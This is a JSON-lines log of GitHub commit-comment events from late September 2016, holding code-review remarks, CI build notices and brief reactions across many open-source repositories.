{"id":"4643759657","type":"CommitCommentEvent","actor":{"login":"Visya"},"repo":{"name":"zusvetal/scrumDashboard"},"payload":{"comment":{"id":19241809,"position":127,"line":127,"path":"app/team/statusField/statusField.js","commit_id":"3bd8f3d98be5e07af99046c01e6f4b9120d95087","created_at":"2016-09-30T14:27:08Z","updated_at":"2016-09-30T14:27:08Z","body":"it's a good practice to separate variables and methods with a new line, especially when they serve different purpose"}},"created_at":"2016-09-30T14:27:08Z"}
{"id":"4643761862","type":"CommitCommentEvent","actor":{"login":"Visya"},"repo":{"name":"zusvetal/scrumDashboard"},"payload":{"comment":{"id":19241812,"position":132,"line":132,"path":"app/team/statusField/statusField.js","commit_id":"3bd8f3d98be5e07af99046c01e6f4b9120d95087","created_at":"2016-09-30T14:27:30Z","updated_at":"2016-09-30T14:27:30Z","body":"snake-case/camelCase, better camelCase"}},"created_at":"2016-09-30T14:27:30Z"}
{"id":"4643762377","type":"CommitCommentEvent","actor":{"login":"sergey-v-galtsev"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":19241815,"position":34,"line":34,"path":"ALGORYTHMS/sort_files/sort_files.cpp","commit_id":"a272cdb01362da9ed22e12a9979782176fc2fab3","created_at":"2016-09-30T14:27:35Z","updated_at":"2016-09-30T14:27:35Z","body":"ИМХО\r\nТоже лучше получать из командной строки."}},"created_at":"2016-09-30T14:27:35Z"}
{"id":"4643768647","type":"CommitCommentEvent","actor":{"login":"Visya"},"repo":{"name":"zusvetal/scrumDashboard"},"payload":{"comment":{"id":19241826,"position":1,"line":1,"path":"app/team/team.js","commit_id":"3bd8f3d98be5e07af99046c01e6f4b9120d95087","created_at":"2016-09-30T14:28:41Z","updated_at":"2016-09-30T14:28:41Z","body":"it's a good practice to wrap your code into self-calling function (unless it's a module), this way you won't end up with teamCtrl in the global context"}},"created_at":"2016-09-30T14:28:41Z"}
{"id":"4643769203","type":"CommitCommentEvent","actor":{"login":"fbbdev"},"repo":{"name":"binki/autoserve"},"payload":{"comment":{"id":19241828,"position":37,"line":59,"path":"index.js","commit_id":"2171973b3caa9135a3ebe3a1437919cba0d0334a","created_at":"2016-09-30T14:28:45Z","updated_at":"2016-09-30T14:28:45Z","body":"People can test if arguments are present or not, it's their responsibility. Javascript is a dynamically typed language, maybe even duck typed. This is not going to hurt autoserve in any way, it will make it act as a (mostly) invisible proxy, which is good and is probably what people would expect from this package. No one would write code tightly coupled with a platform *and* use a generic system like autoserve. I can't think of a good reason to limit the user's freedom in this respect.\r\nThat's what comes to my mind in this moment :smile:"}},"created_at":"2016-09-30T14:28:45Z"}
{"id":"4643773059","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19241834,"position":7,"line":33,"path":"compiler/frontend.java/src/org/jetbrains/kotlin/load/kotlin/incremental/IncrementalPackagePartProvider.kt","commit_id":"408bc84f87dab2f4a9bdadb76bff15d77022aaf2","created_at":"2016-09-30T14:29:24Z","updated_at":"2016-09-30T14:29:24Z","body":"Something like \r\n```\r\n    private val moduleMappings = storageManager.createLazyValue { \r\n        incrementalCaches.map { cache ->\r\n            ModuleMapping.create(cache.getModuleMappingData(), \"<incremental>\")\r\n        } \r\n    }\r\n```\r\nTwo consequent braces in the same line looks very strange"}},"created_at":"2016-09-30T14:29:24Z"}
{"id":"4643774927","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19241838,"position":null,"line":null,"path":null,"commit_id":"0ab996f6187411312e3bb2fddc63cfce2dd95ebc","created_at":"2016-09-30T14:29:44Z","updated_at":"2016-09-30T14:29:44Z","body":"**[unitTests_js_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_js_branches/33766/testReport/) for this commit**"}},"created_at":"2016-09-30T14:29:44Z"}
{"id":"4643775490","type":"CommitCommentEvent","actor":{"login":"keymone"},"repo":{"name":"Yelp/puppet"},"payload":{"comment":{"id":19241839,"position":82,"line":82,"path":"lib/puppet/pops/lookup/interpolation.rb","commit_id":"087312f99e1e45733bec09f5a61f9fa7f1b70874","created_at":"2016-09-30T14:29:50Z","updated_at":"2016-09-30T14:29:50Z","body":"shouldn't this be throwing :undefined_variable or something?"}},"created_at":"2016-09-30T14:29:50Z"}
{"id":"4643776272","type":"CommitCommentEvent","actor":{"login":"mrobbeloth-pdi"},"repo":{"name":"PDi-Communication-Systems-Inc/u-boot_v2009.08"},"payload":{"comment":{"id":19241840,"position":null,"line":null,"path":null,"commit_id":"75af2602f0ea1ab8f4943c2802fc9ffcc5310a77","created_at":"2016-09-30T14:29:57Z","updated_at":"2016-09-30T14:29:57Z","body":"See bug 503"}},"created_at":"2016-09-30T14:29:57Z"}
{"id":"4643780569","type":"CommitCommentEvent","actor":{"login":"NuclearCoder"},"repo":{"name":"Seluj78/General-C-Compiler"},"payload":{"comment":{"id":19241856,"position":13,"line":0,"path":"sources/main.c","commit_id":"bedccdba490074216dcd38bfa2469ed342d471b7","created_at":"2016-09-30T14:30:39Z","updated_at":"2016-09-30T14:30:39Z","body":"not even the right function LUL"}},"created_at":"2016-09-30T14:30:39Z"}
{"id":"4643784111","type":"CommitCommentEvent","actor":{"login":"jeromebrunet"},"repo":{"name":"jeromebrunet/linux"},"payload":{"comment":{"id":19241864,"position":227,"line":227,"path":"drivers/irqchip/irq-meson-gpio.c","commit_id":"0ded35dff70abf1f0344c4a2c34163c60ab24a44","created_at":"2016-09-30T14:31:15Z","updated_at":"2016-09-30T14:31:15Z","body":"This clearly a hack, I know. Here is the reason behind it\r\nThe IP cannot take IRQ_EDGE_BOTH because the polarity in the filtering block is just one bit. You get the rising or the falling edge, not both.\r\n\r\nFor amlogic specific drivers, this is fine. Just request 2 irqs, one rising, one falling and you should be fine\r\nBut if we don't allow IRQ_EDGE_BOTH, we can't have generic driver (like gpio-keys) which request both edge.\r\nSo I know some interrupt might get lost, as described above, but, knowing the limitation, it is still nice to have this.\r\n\r\nIf you think this totally unacceptable, i'll remove it"}},"created_at":"2016-09-30T14:31:15Z"}
{"id":"4643785375","type":"CommitCommentEvent","actor":{"login":"MarcusTwist"},"repo":{"name":"xfunforx/XglyphiOS"},"payload":{"comment":{"id":19241866,"position":null,"line":null,"path":null,"commit_id":"bdf58092799d32aa53a57f5fb44612ba11339a96","created_at":"2016-09-30T14:31:27Z","updated_at":"2016-09-30T14:31:27Z","body":"I didn't just use the code above, I adapted it and changed a few other bits to make displayed captures slightly bigger and square so not distorted. Also made button areas larger so they where easier to press:\r\n\r\n    [button1 setFrame:CGRectMake(size.width-50, 0, 50, 50)];\r\n\r\nimgview1 = [[UIImageView alloc] initWithFrame: CGRectMake(0, 0, 50, 50)];\r\nimgview2 = [[UIImageView alloc] initWithFrame: CGRectMake(50, 0, 50, 50)];\r\nimgview3 = [[UIImageView alloc] initWithFrame: CGRectMake(100, 0, 50, 50)];\r\nimgview4 = [[UIImageView alloc] initWithFrame: CGRectMake(150, 0, 50, 50)];\r\nimgview5 = [[UIImageView alloc] initWithFrame: CGRectMake(200, 0, 50, 50)];\r\n\r\nYou should be able to work out the rest."}},"created_at":"2016-09-30T14:31:27Z"}
{"id":"4643786626","type":"CommitCommentEvent","actor":{"login":"c0r3dmpr"},"repo":{"name":"json-c/json-c"},"payload":{"comment":{"id":19241868,"position":10,"line":33,"path":"linkhash.c","commit_id":"8f8d03df46cf412f69195e2e897956b9117168fe","created_at":"2016-09-30T14:31:38Z","updated_at":"2016-09-30T14:31:38Z","body":"Hi @rgerhards, for some reason this function is not included in latest release _json-c-0.12.1-20160607_ (despite the commit date), however rsyslog versions after _8.16.0_ use it, leading to building failure with message \"error: implicit declaration of function 'json_global_set_string_hash'\". Could you, please, add a release version with this function included?\r\n\r\nThanks. "}},"created_at":"2016-09-30T14:31:38Z"}
{"id":"4643790043","type":"CommitCommentEvent","actor":{"login":"martenson"},"repo":{"name":"galaxyproject/galaxy-lib"},"payload":{"comment":{"id":19241873,"position":null,"line":null,"path":null,"commit_id":"709cea80046bcbcc6cef45f803b78a5514fb6da7","created_at":"2016-09-30T14:32:10Z","updated_at":"2016-09-30T14:32:10Z","body":"thanks @jmchilton !"}},"created_at":"2016-09-30T14:32:10Z"}
{"id":"4643790062","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19241874,"position":null,"line":null,"path":null,"commit_id":"551318ae5f2e672cbfc778f9bce25e3678e5324f","created_at":"2016-09-30T14:32:10Z","updated_at":"2016-09-30T14:32:10Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1226](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14721&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-30T14:32:10Z"}
{"id":"4643791276","type":"CommitCommentEvent","actor":{"login":"wdlkmpx"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":19241880,"position":null,"line":null,"path":null,"commit_id":"53d1842b2c2c652522a63befb54bf8ee8965a85c","created_at":"2016-09-30T14:32:21Z","updated_at":"2016-09-30T14:32:21Z","body":"i was full of doubts. i think maybe the DISTRO_SPECS should specify that the distro correctly handles xorg evdev/udev stuff, i don't know. in the xenial pup thread i read a user set up a wacom tablet manually"}},"created_at":"2016-09-30T14:32:21Z"}
{"id":"4643795408","type":"CommitCommentEvent","actor":{"login":"Seluj78"},"repo":{"name":"Seluj78/General-C-Compiler"},"payload":{"comment":{"id":19241891,"position":null,"line":null,"path":null,"commit_id":"bedccdba490074216dcd38bfa2469ed342d471b7","created_at":"2016-09-30T14:33:02Z","updated_at":"2016-09-30T14:33:02Z","body":"OMG la norme ! Tu ne respecte rien du tout ! x.x mes yeux pleurent :o lit la norme 42 ( Google norme 42 pdf) je prendrais le temps de tout lire et comprendre et corriger demain ;)"}},"created_at":"2016-09-30T14:33:02Z"}
{"id":"4643801025","type":"CommitCommentEvent","actor":{"login":"10alswhd"},"repo":{"name":"10alswhd/BlueHouseProject"},"payload":{"comment":{"id":19241904,"position":null,"line":null,"path":null,"commit_id":"f0f5ec9e5a7e18c08bbdcc74539f6bc99678ff13","created_at":"2016-09-30T14:33:56Z","updated_at":"2016-09-30T14:33:56Z","body":"신기한 코드네요ㅋㅋ"}},"created_at":"2016-09-30T14:33:56Z"}
{"id":"4643801093","type":"CommitCommentEvent","actor":{"login":"Amir-61"},"repo":{"name":"strongloop/loopback-datasource-juggler"},"payload":{"comment":{"id":19241905,"position":null,"line":null,"path":null,"commit_id":"9a1ef0849575a124f963ceb2043916b0b89fbf40","created_at":"2016-09-30T14:33:57Z","updated_at":"2016-09-30T14:33:57Z","body":"Thanks @superkhau! @crandmck Yes please let's land any changes by submitting PRs as opposed to merging changes directly to `master` branch. Please feel free to ping me in the PR so I can review the changes. I appreciate it :-)"}},"created_at":"2016-09-30T14:33:57Z"}
{"id":"4643805899","type":"CommitCommentEvent","actor":{"login":"NuclearCoder"},"repo":{"name":"Seluj78/General-C-Compiler"},"payload":{"comment":{"id":19241912,"position":44,"line":0,"path":"sources/lexer/lexer.c","commit_id":"4081fd6f9480bb9c1bd0497d8983ce201e0a1525","created_at":"2016-09-30T14:34:46Z","updated_at":"2016-09-30T14:34:46Z","body":"this should not parse negative numbers, as these will be handled with unary minus operator"}},"created_at":"2016-09-30T14:34:46Z"}
{"id":"4643808786","type":"CommitCommentEvent","actor":{"login":"blakelcy"},"repo":{"name":"blakelcy/portfolio"},"payload":{"comment":{"id":19241922,"position":null,"line":null,"path":null,"commit_id":"044be49e4f9131f8a8de058103751ba3337edc21","created_at":"2016-09-30T14:35:16Z","updated_at":"2016-09-30T14:35:16Z","body":"Comment"}},"created_at":"2016-09-30T14:35:16Z"}
{"id":"4643815380","type":"CommitCommentEvent","actor":{"login":"Robinlovelace"},"repo":{"name":"npct/pct-shiny"},"payload":{"comment":{"id":19241938,"position":23,"line":23,"path":"scripts/mapgen.R","commit_id":"f5d11719feb8b53ab925cdb21d0c9e446f6d1a0a","created_at":"2016-09-30T14:36:24Z","updated_at":"2016-09-30T14:36:24Z","body":"I wrote it. region.geojson is built by merging many LAs and simplifying - quite a lot of work, somewhere in  https://github.com/npct/pct - Agree re atomic commits, you've mentioned that before :+1: "}},"created_at":"2016-09-30T14:36:24Z"}
{"id":"4643816616","type":"CommitCommentEvent","actor":{"login":"andrewpmiller"},"repo":{"name":"appsembler/edx-theme"},"payload":{"comment":{"id":19241939,"position":149,"line":12,"path":"templates/static_templates/theme-privacy.html","commit_id":"f8e73e2b3ff76a2a4c2efccfdd6444f9204f8167","created_at":"2016-09-30T14:36:37Z","updated_at":"2016-09-30T14:36:37Z","body":"Technically this comment should say \"include privacy policy from git repo\" I think?"}},"created_at":"2016-09-30T14:36:37Z"}
{"id":"4643819964","type":"CommitCommentEvent","actor":{"login":"mitchell-as"},"repo":{"name":"Komodo/komodo-go"},"payload":{"comment":{"id":19241953,"position":null,"line":null,"path":null,"commit_id":"14282c20d7b8c5e33c89d90c716665d15bcac346","created_at":"2016-09-30T14:37:11Z","updated_at":"2016-09-30T14:37:11Z","body":"Thanks, that is helpful indeed. We'll be able to incorporate this in #2062."}},"created_at":"2016-09-30T14:37:11Z"}
{"id":"4643820162","type":"CommitCommentEvent","actor":{"login":"NuclearCoder"},"repo":{"name":"Seluj78/General-C-Compiler"},"payload":{"comment":{"id":19241954,"position":1,"line":0,"path":".vscode/launch.json","commit_id":"4081fd6f9480bb9c1bd0497d8983ce201e0a1525","created_at":"2016-09-30T14:37:13Z","updated_at":"2016-09-30T14:37:13Z","body":"wtf I'm not even on Windows x)"}},"created_at":"2016-09-30T14:37:13Z"}
{"id":"4643822819","type":"CommitCommentEvent","actor":{"login":"latot"},"repo":{"name":"cbm755/octsympy"},"payload":{"comment":{"id":19241965,"position":5,"line":65,"path":"inst/@sym/private/mat_replace.m","commit_id":"cfeed87b3bcc15e4407e57985f208bd209d1d6ee","created_at":"2016-09-30T14:37:39Z","updated_at":"2016-09-30T14:37:39Z","body":"I think this should say something like:\r\n```Multi-Dim not supported yet!```"}},"created_at":"2016-09-30T14:37:39Z"}
{"id":"4643824879","type":"CommitCommentEvent","actor":{"login":"jeromebrunet"},"repo":{"name":"jeromebrunet/linux"},"payload":{"comment":{"id":19241971,"position":457,"line":457,"path":"drivers/irqchip/irq-meson-gpio.c","commit_id":"0ded35dff70abf1f0344c4a2c34163c60ab24a44","created_at":"2016-09-30T14:38:00Z","updated_at":"2016-09-30T14:38:00Z","body":"At this point, We know that `dd->parent_irqs` and `dd->irq_map` are either allocated or NULL.\r\nShould I really check if the pointer in NULL since kfree will already check this for me ?\r\n\r\nYeah, silly question ..."}},"created_at":"2016-09-30T14:38:00Z"}
{"id":"4643825505","type":"CommitCommentEvent","actor":{"login":"NuclearCoder"},"repo":{"name":"Seluj78/General-C-Compiler"},"payload":{"comment":{"id":19241975,"position":null,"line":null,"path":null,"commit_id":"3d680712d5e1a041aa78974ce18fc5895f220960","created_at":"2016-09-30T14:38:07Z","updated_at":"2016-09-30T14:38:07Z","body":"sorry for the spam of Merge commits"}},"created_at":"2016-09-30T14:38:07Z"}
{"id":"4643826969","type":"CommitCommentEvent","actor":{"login":"max3903"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":19241978,"position":null,"line":null,"path":null,"commit_id":"76c443eda331b75bf5dfa7ec22b8eb22e1084343","created_at":"2016-09-30T14:38:21Z","updated_at":"2016-09-30T14:38:21Z","body":"👏👏👏👏"}},"created_at":"2016-09-30T14:38:21Z"}
{"id":"4643830703","type":"CommitCommentEvent","actor":{"login":"TechnoryGaming"},"repo":{"name":"prawnsalad/KiwiIRC"},"payload":{"comment":{"id":19241988,"position":2,"line":535,"path":"client/src/translations/de-de.po","commit_id":"f476985c78fe13bc19f6a73679be961e9a45aef5","created_at":"2016-09-30T14:39:00Z","updated_at":"2016-09-30T14:39:00Z","body":"hjiphjiohjpok,juigfrtgikihrgeqsednk\r\n\r\n"}},"created_at":"2016-09-30T14:39:00Z"}
{"id":"4643832108","type":"CommitCommentEvent","actor":{"login":"jholze"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":19241993,"position":null,"line":null,"path":null,"commit_id":"76c443eda331b75bf5dfa7ec22b8eb22e1084343","created_at":"2016-09-30T14:39:14Z","updated_at":"2016-09-30T14:39:14Z","body":"💯 "}},"created_at":"2016-09-30T14:39:14Z"}
{"id":"4643833212","type":"CommitCommentEvent","actor":{"login":"NuclearCoder"},"repo":{"name":"Seluj78/General-C-Compiler"},"payload":{"comment":{"id":19241995,"position":null,"line":null,"path":null,"commit_id":"bedccdba490074216dcd38bfa2469ed342d471b7","created_at":"2016-09-30T14:39:26Z","updated_at":"2016-09-30T14:39:26Z","body":"hmpf"}},"created_at":"2016-09-30T14:39:26Z"}
{"id":"4643834818","type":"CommitCommentEvent","actor":{"login":"mbifulco"},"repo":{"name":"appsembler/edx-theme"},"payload":{"comment":{"id":19242001,"position":149,"line":12,"path":"templates/static_templates/theme-privacy.html","commit_id":"f8e73e2b3ff76a2a4c2efccfdd6444f9204f8167","created_at":"2016-09-30T14:39:41Z","updated_at":"2016-09-30T14:39:41Z","body":"That's correct.  I lifted the code from somewhere else... ;)\r\n\r\nWill fix."}},"created_at":"2016-09-30T14:39:41Z"}
{"id":"4643834902","type":"CommitCommentEvent","actor":{"login":"scarceller"},"repo":{"name":"haroldwongms/azure-quickstart-templates"},"payload":{"comment":{"id":19242003,"position":null,"line":null,"path":null,"commit_id":"050cce6dcc534ab7a287363134295a0a4c93148f","created_at":"2016-09-30T14:39:42Z","updated_at":"2016-09-30T14:39:42Z","body":"I'm trying to use this Azure template, what cmd do you execute? something like this:\r\n azure group deployment create --template-file azuredeploy.parameters.json sal_oso_group\r\nI get all sorts of errors trying to execute this template. Just want to be sure I'm running the correct cmd from the azure CLI."}},"created_at":"2016-09-30T14:39:42Z"}
{"id":"4643836092","type":"CommitCommentEvent","actor":{"login":"carl-eis"},"repo":{"name":"nova-web-dev/mm-website"},"payload":{"comment":{"id":19242008,"position":1,"line":1,"path":"js/jquery.countdown.min.js","commit_id":"6a88f5f79c0a4da4039635ce67442813b1a7b80a","created_at":"2016-09-30T14:39:56Z","updated_at":"2016-09-30T14:39:56Z","body":"Countdown stops working after this change"}},"created_at":"2016-09-30T14:39:56Z"}
{"id":"4643836414","type":"CommitCommentEvent","actor":{"login":"ledvinap"},"repo":{"name":"betaflight/betaflight"},"payload":{"comment":{"id":19242009,"position":null,"line":null,"path":null,"commit_id":"cab7b562d8dec756d925380162f47a93f1e5e0eb","created_at":"2016-09-30T14:39:58Z","updated_at":"2016-09-30T14:39:58Z","body":"@borisbstyle : It would be good idea to keep values in `float` between filters. Or even better support cascade of biquad sections as simple filter (but with Direct form 2 transposed there is little difference, filter memory is in middle of filter)\r\n\r\nAs for delay ... group delay of 2nd order notch filter with center at 200Hz and 100Hz bandwidth, 1kHz sample rate (linear gain on top, group delay bottom):\r\n![notch](https://cloud.githubusercontent.com/assets/2318015/18995425/672dc1a4-872c-11e6-8573-f0a1d8522cf4.PNG)\r\n\r\n"}},"created_at":"2016-09-30T14:39:58Z"}
{"id":"4643842870","type":"CommitCommentEvent","actor":{"login":"imknown"},"repo":{"name":"racaljk/hosts"},"payload":{"comment":{"id":19242024,"position":null,"line":null,"path":null,"commit_id":"026d52fab9728f311b8edabaf8a4b598d207f5a7","created_at":"2016-09-30T14:41:00Z","updated_at":"2016-09-30T14:41:00Z","body":"感觉无爱了"}},"created_at":"2016-09-30T14:41:00Z"}
{"id":"4643843051","type":"CommitCommentEvent","actor":{"login":"akervern"},"repo":{"name":"nuxeo/nuxeo-csv"},"payload":{"comment":{"id":19242025,"position":13,"line":123,"path":"src/test/java/org/nuxeo/ecm/csv/TestCSVImport.java","commit_id":"3e5a3cade76edf282fe8c8a04231306dbd65cdc7","created_at":"2016-09-30T14:41:02Z","updated_at":"2016-09-30T14:41:02Z","body":"Why do you have to not use the default OPTIONS to make the test passing? \r\nI understand it like thoses features break the default mode."}},"created_at":"2016-09-30T14:41:02Z"}
{"id":"4643845924","type":"CommitCommentEvent","actor":{"login":"jeromebrunet"},"repo":{"name":"jeromebrunet/linux"},"payload":{"comment":{"id":19242032,"position":19,"line":891,"path":"drivers/pinctrl/meson/pinctrl-meson8b.c","commit_id":"9a36e4d3cb2799bdee493cb0cbdd3167e931dcc1","created_at":"2016-09-30T14:41:32Z","updated_at":"2016-09-30T14:41:32Z","body":"Could not find this bank in the meson8b DS and according to it, irq gpio finish at 118"}},"created_at":"2016-09-30T14:41:32Z"}
{"id":"4643846921","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19242035,"position":null,"line":null,"path":null,"commit_id":"551318ae5f2e672cbfc778f9bce25e3678e5324f","created_at":"2016-09-30T14:41:41Z","updated_at":"2016-09-30T14:41:41Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1226](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14721&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 9 (9 new), passed: 227, ignored: 3 Build time: 00:09:31\n### Failed tests\n```\norg.genivi.sota.device_registry.DeviceResourceSpec.GET request with ?deviceId after creating yields same device.: <no details avaliable>\n\norg.genivi.sota.device_registry.DeviceResourceSpec.POST request creates a new device.: <no details avaliable>\n\norg.genivi.sota.device_registry.DeviceResourceSpec.DELETE request after POST succeds and deletes device.: <no details avaliable>\n\norg.genivi.sota.device_registry.DeviceResourceSpec.POST request on 'ping' should update 'lastSeen' field for device.: <no details avaliable>\n\norg.genivi.sota.device_registry.DeviceResourceSpec.POST request with same deviceName fails with conflict.: <no details avaliable>\n\norg.genivi.sota.device_registry.DeviceResourceSpec.GET system_info after POST should return what was posted.: <no details avaliable>\n\norg.genivi.sota.device_registry.DeviceResourceSpec.GET system_info after PUT should return what was updated.: <no details avaliable>\n\norg.genivi.sota.device_registry.DeviceResourceSpec.PUT system_info if not previously created should create it.: <no details avaliable>\n\norg.genivi.sota.device_registry.DeviceResourceSpec.system_info adds unique numbers for each id-field: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-30T14:41:41Z"}
{"id":"4643849059","type":"CommitCommentEvent","actor":{"login":"ziprandom"},"repo":{"name":"geografia-au/geografia-au.github.io"},"payload":{"comment":{"id":19242040,"position":6,"line":13,"path":"source/content/projects/advancing_orbost_economic_development_strategy.md","commit_id":"265772d079fb417b8ba0dfbbd3695207d0a0dea2","created_at":"2016-09-30T14:42:03Z","updated_at":"2016-09-30T14:42:03Z","body":"If this is meant to indicate whether this project should be shown on the website, rename it to \r\n\r\n```\r\ndraft: false \r\n```\r\n\r\nwhere ```draft: true``` means that it wont'be published into the blog ..."}},"created_at":"2016-09-30T14:42:03Z"}
{"id":"4643852154","type":"CommitCommentEvent","actor":{"login":"jeromebrunet"},"repo":{"name":"jeromebrunet/linux"},"payload":{"comment":{"id":19242049,"position":26,"line":896,"path":"drivers/pinctrl/meson/pinctrl-meson8b.c","commit_id":"9a36e4d3cb2799bdee493cb0cbdd3167e931dcc1","created_at":"2016-09-30T14:42:32Z","updated_at":"2016-09-30T14:42:32Z","body":"This bank has more that 13 pin, but the 2 last one are not documented and IRQ is supposed to finish at 13 for this bank."}},"created_at":"2016-09-30T14:42:32Z"}
{"id":"4643852276","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19242050,"position":null,"line":null,"path":null,"commit_id":"2444930c625e6214cce121468a77d92c7a4bd8e8","created_at":"2016-09-30T14:42:32Z","updated_at":"2016-09-30T14:42:32Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1227](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14724&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-30T14:42:32Z"}
{"id":"4643854306","type":"CommitCommentEvent","actor":{"login":"rewolff"},"repo":{"name":"traviscross/mtr"},"payload":{"comment":{"id":19242062,"position":null,"line":null,"path":null,"commit_id":"b90a522f23167bd00062504803e94220937aba23","created_at":"2016-09-30T14:42:53Z","updated_at":"2016-09-30T14:42:53Z","body":"I think it works as intended. As you can see in the deleted code, many fields are initialized to zero, and only a few are set to anything else. \r\n```\r\nstruct test {\r\n\r\nint x;\r\nint y[10];\r\nint z;\r\n}; \r\n\r\nstruct test bla = {\r\n.y = {-2}\r\n};\r\n\r\nint main (int argc, char **argv)\r\n\r\n{\r\n int i;\r\n printf (\"bla.x = %d\\n\", bla.x);\r\n printf (\"bla.y = \");\r\n for (i=0;i<10;i++) {\r\n  printf (\"%d \", bla.y[i]);\r\n }\r\n printf (\"\\nbla.z = %d\\n\", bla.z);\r\n}\r\n\r\n```\r\n\r\nI tested this and got  bla.y = -2 0 0 0 0 0 0 0 0 0 so, you're right that not all elements of hte array are getting initialized as in the original version.... \r\n"}},"created_at":"2016-09-30T14:42:53Z"}
{"id":"4643855437","type":"CommitCommentEvent","actor":{"login":"siro20"},"repo":{"name":"iXit/Mesa-3D"},"payload":{"comment":{"id":19242063,"position":29,"line":342,"path":"src/gallium/state_trackers/nine/nine_ff.c","commit_id":"208bed4002a60323304a8d8a5afc2ef9414c7593","created_at":"2016-09-30T14:43:06Z","updated_at":"2016-09-30T14:43:06Z","body":"those renaming seems unrelated to temporary cleanup"}},"created_at":"2016-09-30T14:43:06Z"}
{"id":"4643867675","type":"CommitCommentEvent","actor":{"login":"dret"},"repo":{"name":"mogsie/webconcepts"},"payload":{"comment":{"id":19242093,"position":null,"line":null,"path":null,"commit_id":"5374105de524e57de5d0989c1b9046f021c03bda","created_at":"2016-09-30T14:45:14Z","updated_at":"2016-09-30T14:45:14Z","body":"answering your questions:\r\n\r\n* yes, it would be good to add more from RFC 4229, but so far i haven't spent the time to decide which ones make most sense. and it would be a subjective decision, i assume.\r\n* if there is more than one spec, they get listed side by side, such as here: http://webconcepts.info/concepts/http-header/Accept-Additions. the problem then is what is considered the \"authoritative source (@arno-di-loreto had the same question), and i have no answer for that. sometimes IETF/IANA are silent on that (they just list multiple entries in their registry), so that's not a question that's very easy to answer.\r\n"}},"created_at":"2016-09-30T14:45:14Z"}
{"id":"4643868464","type":"CommitCommentEvent","actor":{"login":"jdcasey"},"repo":{"name":"yma88/indy"},"payload":{"comment":{"id":19242095,"position":null,"line":null,"path":null,"commit_id":"4ff5c7c22f245bb799793f8385609cdebb33a0c5","created_at":"2016-09-30T14:45:21Z","updated_at":"2016-09-30T14:45:21Z","body":"Hi @yma88 I think I'd prefer to see this implemented in the ImpliedRepositoryDetector, actually. Subclassing the RemoteRepository for this seems a little awkward, and constructing a whole new Galley environment to check for existence is pretty heavy. In ImpliedRepositoryDetector, you could simply @Inject TransferManager (or, with recent changes in Indy, you could use DownloadManager), then call exists() through the instance that Indy already uses.\r\n\r\nI think what I'd prefer to see is adding a line to the ImpliedRepostioryDetector, right after the factory script creates a new RemoteRepository instance, but *before* it gets stored in the StoreDataManager. This line would call checkValidity(..) and pass in the new repository instance. You could almost copy the checkUrlValidity you have now, but use the injected DownloadManager to call .exists() instead."}},"created_at":"2016-09-30T14:45:21Z"}
{"id":"4643871306","type":"CommitCommentEvent","actor":{"login":"zengchw"},"repo":{"name":"btpka3/btpka3.github.com"},"payload":{"comment":{"id":19242103,"position":null,"line":null,"path":null,"commit_id":"76a9e91f46b772972f79c7ddc81443e9bf02c1ce","created_at":"2016-09-30T14:45:50Z","updated_at":"2016-09-30T14:45:50Z","body":"这块没了解过，不看根本不会往这想"}},"created_at":"2016-09-30T14:45:50Z"}
{"id":"4643872417","type":"CommitCommentEvent","actor":{"login":"jeromebrunet"},"repo":{"name":"jeromebrunet/linux"},"payload":{"comment":{"id":19242104,"position":85,"line":661,"path":"drivers/pinctrl/meson/pinctrl-meson.c","commit_id":"8c97e26b695f7666879f9e244a145dc01aabbf04","created_at":"2016-09-30T14:46:02Z","updated_at":"2016-09-30T14:46:02Z","body":"Yeah, Here I would to check if the irq-parent is actually the gpio controller, and not gic (if the controller is not declared in DT for exemple)\r\n\r\nI'm not sure how to proceed. I was thinking about adding something like `irq-compatible` in the meson pinctrl data and check if it match the compatible field of the parent.\r\n\r\nWhat do you think ?"}},"created_at":"2016-09-30T14:46:02Z"}
{"id":"4643873715","type":"CommitCommentEvent","actor":{"login":"siro20"},"repo":{"name":"iXit/Mesa-3D"},"payload":{"comment":{"id":19242106,"position":152,"line":497,"path":"src/gallium/state_trackers/nine/nine_ff.c","commit_id":"208bed4002a60323304a8d8a5afc2ef9414c7593","created_at":"2016-09-30T14:46:14Z","updated_at":"2016-09-30T14:46:14Z","body":"you leak aVtx_dst in case of need_aVtx"}},"created_at":"2016-09-30T14:46:14Z"}
{"id":"4643882296","type":"CommitCommentEvent","actor":{"login":"jeromebrunet"},"repo":{"name":"jeromebrunet/linux"},"payload":{"comment":{"id":19242132,"position":26,"line":316,"path":"arch/arm64/boot/dts/amlogic/meson-gxbb.dtsi","commit_id":"ee5b5b480834ed5c979da82b975d74fe0f41cd66","created_at":"2016-09-30T14:47:39Z","updated_at":"2016-09-30T14:47:39Z","body":"I'm not really sure whether this is the right place for this.\r\nShould it go here or in the gpio block ?"}},"created_at":"2016-09-30T14:47:39Z"}
